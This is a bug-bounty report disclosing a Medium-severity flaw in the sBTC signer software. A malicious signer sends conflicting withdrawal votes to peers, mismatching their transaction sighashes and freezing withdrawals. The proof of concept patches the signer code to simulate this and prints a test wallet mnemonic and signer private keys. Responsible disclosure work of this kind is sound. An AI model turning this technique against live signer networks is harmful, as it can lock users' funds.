#40655 [BC-Medium] Malicious signers can give different votes to other Signers to prevent sBTC withdrawal

Submitted on Feb 28th 2025 at 14:44:26 UTC by @f4lc0n for Attackathon | Stacks II

Report ID: #40655
Report Type: Blockchain/DLT
Report severity: Medium
Target: https://github.com/stacks-network/sbtc/tree/immunefi_attackaton_1.0
Impacts:
- Permanent freezing of funds (fix requires hardfork)

Description

Brief/Intro

After each signer finds a new withdrawal request, it will check it and vote on it (accept is true or false). Each signer will send its vote to other signers and save the votes received from other signers. Then, when each signer generates a withdrawal BTC transaction, the signer_bitmap (that is, votes received from other signers) will be packaged into the BTC transaction.

Then, the malicious signer can send different votes to different signers.

For example, there are 12 signers in total and the multi-signature threshold is 8.
The malicious signer sends a message with accept as true to 5 signers and a message with accept as false to the other 6 signers.
Then, when the coordinator requests the BTC transaction signature from all signers, the signers will generate two different BTC transactions, representing the malicious signer's accept as true and false respectively.
In the end, this BTC transaction will not be executed because at most only 6 signers' BTC transaction sighashes are the same.

Vulnerability Details

The signer/src/bitcoin/utxo.rs::WithdrawalRequest struct code is as follows. The signer_bitmap represents the votes of other signers received by the current signer.

#[derive(Debug, Clone, Hash, PartialEq, Eq, PartialOrd, Ord)]
pub struct WithdrawalRequest {
    /// The request id generated by the smart contract when the
    /// `initiate-withdrawal-request` public function was called.
    pub request_id: u64,
    /// The stacks transaction ID that lead to the creation of the
    /// withdrawal request.
    pub txid: StacksTxId,
    /// Stacks block ID of the block that includes the transaction
    /// associated with this withdrawal request.
    pub block_hash: StacksBlockHash,
    /// The amount of BTC, in sats, to withdraw.
    pub amount: u64,
    /// The max fee amount to use for the sBTC deposit transaction.
    pub max_fee: u64,
    /// The script_pubkey of the output.
    pub script_pubkey: ScriptPubKey,
    /// A bitmap of how the signers voted. This structure supports up to
    /// 128 distinct signers. Here, we assume that a 1 (or true) implies
    /// that the signer voted *against* the transaction.
    pub signer_bitmap: BitArray<[u8; 16]>,
}

The signer/src/bitcoin/utxo.rs::UnsignedTransaction::withdrawal_merkle_root function code is as follows. It will put the hash of all WithdrawalRequests into the BTC transaction. That is to say, if the votes received by the signer is different, the BTC transaction it generates will also be different.

    /// The OP_RETURN output includes a merkle tree of the Stacks
    /// transactions that lead to the inclusion of the UTXOs in this
    /// transaction.
    ///
    /// Create the OP_RETURN UTXO for the associated withdrawal request.
    ///
    /// The data returned from this function is a merkle tree constructed
    /// from the HASH160 of each withdrawal request's sBTC data returned by
    /// the [`WithdrawalRequest::sbtc_data`].
    ///
    /// For more on the rationale for this output, see this ticket:
    /// <https://github.com/stacks-network/sbtc/issues/483>.
    ///
    /// `None` is returned if there are no withdrawal requests in the input
    /// slice.
    fn withdrawal_merkle_root(reqs: &Requests) -> Option<[u8; 20]> {
        let hashes = reqs
            .iter()
            .filter_map(RequestRef::as_withdrawal)
            .map(|req| Hash160::hash(&req.sbtc_data()));

        bitcoin::merkle_tree::calculate_root(hashes).map(|hash| hash.to_byte_array())
    }

Impact Details

All withdrawal BTC transactions cannot be executed, resulting in sBTC being frozen.
Since the input of withdrawal BTC transactions may be deposits, deposits may also not be executed.

References

None

Proof of Concept

Base on: https://github.com/stacks-network/sbtc/tree/immunefi_attackaton_1.0
Auditor wallet address: ST2BEV097EV2R9ZMFRMRT904QB5RFYMA0683TC111
Auditor wallet mnemonics: spawn knee orchard patrol merge forget dust position daring short bridge elevator attitude leopard opera appear auction limit magic hover tunnel museum quantum manual

Patch docker/stacks/stacks-regtest-miner.toml. Give the auditor address some STX for testing.

 [[ustx_balance]]
 address = "ST3497E9JFQ7KB9VEHAZRWYKF3296WQZEXBPXG193" # Demo principal
 amount = 10000000000000000
 
+[[ustx_balance]]
+address = "ST2BEV097EV2R9ZMFRMRT904QB5RFYMA0683TC111" # Auditor principal
+amount = 10000000000000000

Add this code to signer/src/bin/pocinit.rs. On the basis of ./signers.sh demo command, it also deposited some sBTC to the auditor address for testing

Add pocinit bin to signer/Cargo.toml

+ [[bin]]
+ name = "pocinit"
+ path = "src/bin/pocinit.rs"

Patch signer/src/request_decider.rs. In this way, we simulate that sbtc-signer-1 receives true accept from sbtc-signer-3 and sbtc-signer-2 receives false accept from sbtc-signer-3. We don't patch the message sender because that is too complicated.

     #[tracing::instrument(skip_all, fields(sender = %signer_pub_key))]
     async fn persist_received_withdraw_decision(
         &mut self,
         decision: &SignerWithdrawalDecision,
         signer_pub_key: PublicKey,
     ) -> Result<(), Error> {
-        let signer_decision = WithdrawalSigner {
+        let mut signer_decision = WithdrawalSigner {
             request_id: decision.request_id,
             block_hash: decision.block_hash.into(),
             signer_pub_key,
             is_accepted: decision.accepted,
             txid: decision.txid,
         };
 
         // TODO: we need to check to see if we have the withdrawal request
         // first.
 
         // AUDIT begin
+        let signer1_public_key = PublicKey::from_private_key(&PrivateKey::from_slice(&[0x41, 0x63, 0x47, 0x62, 0xd8, 0x9d, 0xfa, 0x09, 0x13, 0x3a, 0x4a, 0x8e, 0x9c, 0x13, 0x78, 0xd0, 0x16, 0x1d, 0x29, 0xcd, 0x0a, 0x94, 0x33, 0xb5, 0x1f, 0x1e, 0x3d, 0x32, 0x94, 0x7a, 0x73, 0xdc])?);
+        let signer2_public_key = PublicKey::from_private_key(&PrivateKey::from_slice(&[0x9b, 0xfe, 0xcf, 0x16, 0xc9, 0xc1, 0x27, 0x92, 0x58, 0x9d, 0xd2, 0xb8, 0x43, 0xf8, 0x50, 0xd5, 0xb8, 0x9b, 0x81, 0xa0, 0x4f, 0x8a, 0xb9, 0x1c, 0x08, 0x3b, 0xdf, 0x67, 0x09, 0xfb, 0xef, 0xee])?);
+        let signer3_public_key = PublicKey::from_private_key(&PrivateKey::from_slice(&[0x3e, 0xc0, 0xca, 0x57, 0x70, 0xa3, 0x56, 0xd6, 0xcd, 0x1a, 0x9b, 0xfc, 0xbf, 0x6c, 0xd1, 0x51, 0xeb, 0x1b, 0xd8, 0x5c, 0x38, 0x8c, 0xc0, 0x06, 0x48, 0xec, 0x4e, 0xf5, 0x85, 0x3f, 0xdb, 0x74])?);
+        if signer_pub_key == signer3_public_key {
+            if self.signer_public_key() == signer1_public_key {
+                tracing::info!("AUDIT signer1 receive msg from signer3, set `decision.accepted` to `true`");
+                signer_decision.is_accepted = true;
+            } else if self.signer_public_key() == signer2_public_key {
+                tracing::info!("AUDIT signer2 receive msg from signer3, set `decision.accepted` to `false`");
+                signer_decision.is_accepted = false;
+            }
+        }
+        // AUDIT end
         self.context
             .get_storage_mut()
             .write_withdrawal_signer_decision(&signer_decision)

Run devenv and run pocinit

make devenv-up
cargo run -p signer --bin pocinit

Use Sandbox to call sbtc-withdrawal.initiate-withdrawal-request to trigger a withdrawal.

Check the logs and you will see that every time one of sbtc-signer-1 or sbtc-signer-2 throws the following error.

2025-02-28T14:37:15.647265751Z ERROR tx-signer{public_key=031a4d9f4903da97498945a4e01a5023a1d53bc96ad670bfe03adf8a06c52e6380}: signer::transaction_signer: error processing signer message error=the given sighash is unknown: 89aa022853eda773a1aa278cc0226d92d68d360f2e1503a3466c8642fa5f1bab

It should be noted that the withdrawal was finally executed successfully because we only patched sbtc-signer-1 and sbtc-signer-2. In reality, the attacker sbtc-signer-3 only needs to refuse to sign to make the 2/3 multi-signature difficult to execute.

Previous#40692 [BC-High] Calling multiple withdrawals on a single transaction causes Signers to halt and the network to stop Next#40731 [BC-Medium] A malicious signer can force a panic in the coordinator by sending `DkgFailure::BadPrivateShares` with an invalid signer ID

Was this helpful?